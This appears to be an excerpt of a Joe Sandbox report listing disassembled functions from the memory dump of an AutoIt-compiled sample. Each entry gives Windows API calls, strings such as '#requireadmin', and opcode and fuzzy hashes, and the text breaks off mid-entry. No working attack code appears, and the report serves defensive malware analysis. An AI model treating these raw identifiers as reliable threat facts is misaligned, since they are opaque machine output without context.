                                        • Instruction ID: 6ef7b96b47ac4add2cd5934d9938395b314f82565df0116398598b3ed85ede47
                                        • Opcode Fuzzy Hash: 50cb094cd548e1c182ea57cb61f797b6eafc98eff77d7d02eb1d9752ca4e138e
                                        • Instruction Fuzzy Hash: 9C213135605208AFDB20AFA8DC88DAB77ECFB09764B108126F915DB760DA709C469B64
                                        Function 00EDFB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                        • API String ID: 1038674560-2734436370
                                        • Opcode ID: 452611bab9364400f2cc879d0ff771a0034cad58a5ec56f08a03297d7c5b9322
                                        • Instruction ID: 1934c51471c7a3b30b70b7c9737389f7fadf4d09a3147a4e1fd4fb92aa97fc8f
                                        • Opcode Fuzzy Hash: 452611bab9364400f2cc879d0ff771a0034cad58a5ec56f08a03297d7c5b9322
                                        • Instruction Fuzzy Hash: 77216732114150A6D330E634DC12EE7B3D8DF56344F14A037F887BA281EB50EDA3E295
                                        Function 00F0783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E81D73
                                          • Part of subcall function 00E81D35: GetStockObject.GDI32(00000011), ref: 00E81D87
                                          • Part of subcall function 00E81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E81D91
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F078A1
                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F078AE
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F078B9
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F078C8
                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F078D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$CreateObjectStockWindow
                                        • String ID: Msctls_Progress32
                                        • API String ID: 1025951953-3636473452
                                        • Opcode ID: d7e04d207f1ee576a6062b2ab64d7a9fdb19c2fadf6cc073abbf1ed20007e860
                                        • Instruction ID: 0c7da50bf85f63c77fde4e4a4467e01f28b119a6740b8cfc600e7390284b6dd8
                                        • Opcode Fuzzy Hash: d7e04d207f1ee576a6062b2ab64d7a9fdb19c2fadf6cc073abbf1ed20007e860
                                        • Instruction Fuzzy Hash: FE1163B2550219BFEF159F60CC85EE77F5DEF08768F118115FA04A60A0D772AC21EBA4
                                        Function 00EA41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00EA41E3
                                        • GetProcAddress.KERNEL32(00000000), ref: 00EA41EA
                                        • RtlEncodePointer.NTDLL(00000000), ref: 00EA41F6
                                        • RtlDecodePointer.NTDLL(00000001), ref: 00EA4213
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                        • String ID: RoInitialize$combase.dll
                                        • API String ID: 3489934621-340411864
                                        • Opcode ID: e2ce78c40b03a326d76e98cba0d2193152c9e687b9714555fc88a720aa248ed3
                                        • Instruction ID: bba69699bc667a5beaffbe1491385c7096b9eb544f6d55a64cae73c52b0984ef
                                        • Opcode Fuzzy Hash: e2ce78c40b03a326d76e98cba0d2193152c9e687b9714555fc88a720aa248ed3
                                        • Instruction Fuzzy Hash: 22E01AF8690348AFEB315BB0EC09B443AA4B7B6706F109424B811F94E0DBB574D9BF00
                                        Function 00EA429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EA41B8), ref: 00EA42B8
                                        • GetProcAddress.KERNEL32(00000000), ref: 00EA42BF
                                        • RtlEncodePointer.NTDLL(00000000), ref: 00EA42CA
                                        • RtlDecodePointer.NTDLL(00EA41B8), ref: 00EA42E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                        • String ID: RoUninitialize$combase.dll
                                        • API String ID: 3489934621-2819208100
                                        • Opcode ID: e724bc5ab711bf90574b6a5226a94180c64aee0cbb6637e2f4b961c22c643b68
                                        • Instruction ID: 4947b0c10c0776ee9adc3579ef490211c86a841519d90547d0e32c9c87327d87
                                        • Opcode Fuzzy Hash: e724bc5ab711bf90574b6a5226a94180c64aee0cbb6637e2f4b961c22c643b68
                                        • Instruction Fuzzy Hash: 5AE0BF7C5413089BEB619B60FD0EB443AA4B766746F205025F401F54B0CBB4A594FA15
                                        Function 00EF6E8A Relevance: 9.2, APIs: 6, Instructions: 212COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7756214535e191a0a5d537a56f75abb2491a5da653f7bc2ee2cd63a02452ec71
                                        • Instruction ID: 9770cf7df61dfb75966334ce384bc0d477126e0a85ab2460eb735b6a4640d1e9
                                        • Opcode Fuzzy Hash: 7756214535e191a0a5d537a56f75abb2491a5da653f7bc2ee2cd63a02452ec71
                                        • Instruction Fuzzy Hash: B261CE32508304ABD710EB24CC81E6FB7E9EF84714F14691DF68AA72A2DF70AD04C792
                                        Function 00EE675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove$__itow__swprintf
                                        • String ID:
                                        • API String ID: 3253778849-0
                                        • Opcode ID: 3de8140073a542bac1ef19cd975c9b89834d05d12304b7d667d95f1e56340aec
                                        • Instruction ID: 87e657c5aa5973d677dd2c440333dacdea5116dc508d0615ca761f6d14889ad8
                                        • Opcode Fuzzy Hash: 3de8140073a542bac1ef19cd975c9b89834d05d12304b7d667d95f1e56340aec
                                        • Instruction Fuzzy Hash: 2561893050029A9BCF15EF61CC82EFE77A4AF99348F086559F8597B292DB31AD41CB50
                                        Function 00F0046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00F010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00548
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F00588
                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F005AB
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F005D4
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F00617
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F00624
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                        • String ID:
                                        • API String ID: 4046560759-0
                                        • Opcode ID: 1b166ad81767ec6c6e7fc518d0d475569767bd9237deb0648d8a563054e1279d
                                        • Instruction ID: 4e4575c1a4c91ccafac4abf7ed34b3671295b8d60ca3d65160965319af14a328
                                        • Opcode Fuzzy Hash: 1b166ad81767ec6c6e7fc518d0d475569767bd9237deb0648d8a563054e1279d
                                        • Instruction Fuzzy Hash: ED515931608200AFCB14EB24CC85E6FBBE9FF88714F04491DF599972A1DB31E905EB52
                                        Function 00F05A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenu.USER32(?), ref: 00F05A82
                                        • GetMenuItemCount.USER32(00000000), ref: 00F05AB9
                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F05AE1
                                        • GetMenuItemID.USER32(?,?), ref: 00F05B50
                                        • GetSubMenu.USER32(?,?), ref: 00F05B5E
                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F05BAF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountMessagePostString
                                        • String ID:
                                        • API String ID: 650687236-0
                                        • Opcode ID: 8d775bb7aada2e6c8397aa15ba574770b40a2578dbc1c52002042fab25943bfb
                                        • Instruction ID: 3448ffd3b02c811703c69f70dc0c381960bfe864bc38e10ef1f9400e3c53bc15
                                        • Opcode Fuzzy Hash: 8d775bb7aada2e6c8397aa15ba574770b40a2578dbc1c52002042fab25943bfb
                                        • Instruction Fuzzy Hash: 00519F75E00619AFCB10EFA4C845AAEB7F4EF48720F104099E805BB291CB74BE41EF90
                                        Function 00EDF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00EDF3F7
                                        • VariantClear.OLEAUT32(00000013), ref: 00EDF469
                                        • VariantClear.OLEAUT32(00000000), ref: 00EDF4C4
                                        • _memmove.LIBCMT ref: 00EDF4EE
                                        • VariantClear.OLEAUT32(?), ref: 00EDF53B
                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00EDF569
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                        • String ID:
                                        • API String ID: 1101466143-0
                                        • Opcode ID: f12e6ed4d8c2af45c5e4f4605a830d452027f307be476667d410f3ad8fe75b7b
                                        • Instruction ID: 28bfb69ad9e11a9637667f02720f499b7ca627903187af94a19d9ffe8350ab3b
                                        • Opcode Fuzzy Hash: f12e6ed4d8c2af45c5e4f4605a830d452027f307be476667d410f3ad8fe75b7b
                                        • Instruction Fuzzy Hash: C9513CB5A00209DFCB14CF58D884AAAB7F8FF4C354B15856AED59EB311D730E952CBA0
                                        Function 00EE26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00EE2747
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE2792
                                        • IsMenu.USER32(00000000), ref: 00EE27B2
                                        • CreatePopupMenu.USER32 ref: 00EE27E6
                                        • GetMenuItemCount.USER32(000000FF), ref: 00EE2844
                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00EE2875
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                        • String ID:
                                        • API String ID: 3311875123-0
                                        • Opcode ID: 05ae6f60e648d02e14a00773e80a05e9309abb484d20bb37dc5a852fb94f5f16
                                        • Instruction ID: b883a90320c4cec647f90d46e7f6cee47eb03b541d99d5b1daf760580d1df3fe
                                        • Opcode Fuzzy Hash: 05ae6f60e648d02e14a00773e80a05e9309abb484d20bb37dc5a852fb94f5f16
                                        • Instruction Fuzzy Hash: 4F51B070A0038DDBDF28CF6AD888AAEBBF8BF44318F14516DE615AB291D7708904CB55
                                        Function 00E81765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E8179A
                                        • GetWindowRect.USER32(?,?), ref: 00E817FE
                                        • ScreenToClient.USER32(?,?), ref: 00E8181B
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E8182C
                                        • EndPaint.USER32(?,?), ref: 00E81876
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                        • String ID:
                                        • API String ID: 1827037458-0
                                        • Opcode ID: b416a711d42bdad425aa3a76bb02b3cf54bd4af87b8e7ea0974e4c9f75c8b849
                                        • Instruction ID: d2d8fc351051a9e9e1dec9df4e0e1e3acb27f1604a615ccb1a8d57a09baaf674
                                        • Opcode Fuzzy Hash: b416a711d42bdad425aa3a76bb02b3cf54bd4af87b8e7ea0974e4c9f75c8b849
                                        • Instruction Fuzzy Hash: FC41A0705043049FD720EF24CC85FBA7BE8FB5A724F040669F9A8D62A1C7719846EB62
                                        Function 00F0B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(00F467B0,00000000,01162A70,?,?,00F467B0,?,00F0B862,?,?), ref: 00F0B9CC
                                        • EnableWindow.USER32(00000000,00000000), ref: 00F0B9F0
                                        • ShowWindow.USER32(00F467B0,00000000,01162A70,?,?,00F467B0,?,00F0B862,?,?), ref: 00F0BA50
                                        • ShowWindow.USER32(00000000,00000004,?,00F0B862,?,?), ref: 00F0BA62
                                        • EnableWindow.USER32(00000000,00000001), ref: 00F0BA86
                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F0BAA9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID:
                                        • API String ID: 642888154-0
                                        • Opcode ID: de8a297c1c43cce4a619741de79239f3563b0a2c135b7456a47b9386f3c1767a
                                        • Instruction ID: a48c9717739f903213af3cb344213e9c6c6d99bfcce7cfd2e66dcd07a943d143
                                        • Opcode Fuzzy Hash: de8a297c1c43cce4a619741de79239f3563b0a2c135b7456a47b9386f3c1767a
                                        • Instruction Fuzzy Hash: D8413034A00245AFDB26CF18C489B957BE1FB05725F1842B9EE488F6E2C735A845FB61
                                        Function 00EF73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00EF5134,?,?,00000000,00000001), ref: 00EF73BF
                                          • Part of subcall function 00EF3C94: GetWindowRect.USER32(?,?), ref: 00EF3CA7
                                        • GetDesktopWindow.USER32 ref: 00EF73E9
                                        • GetWindowRect.USER32(00000000), ref: 00EF73F0
                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EF7422
                                          • Part of subcall function 00EE54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE555E
                                        • GetCursorPos.USER32(?), ref: 00EF744E
                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EF74AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                        • String ID:
                                        • API String ID: 4137160315-0
                                        • Opcode ID: feaab00622d93821d7f90b04b3582377a2de19918f84da50c391d9ffb8d37539
                                        • Instruction ID: 7bdf8a8a7f9ffadc09420374fd5805fe466b177c74b491e96b1fe667e0e010f1
                                        • Opcode Fuzzy Hash: feaab00622d93821d7f90b04b3582377a2de19918f84da50c391d9ffb8d37539
                                        • Instruction Fuzzy Hash: 5131E872508309ABD720DF54DC49F6BBBDAFF88314F001919F995A7191CB30E909CB92
                                        Function 00EEED8E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                          • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                                        • _wcstok.LIBCMT ref: 00EEEEFF
                                        • _wcscpy.LIBCMT ref: 00EEEF8E
                                        • _memset.LIBCMT ref: 00EEEFC1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
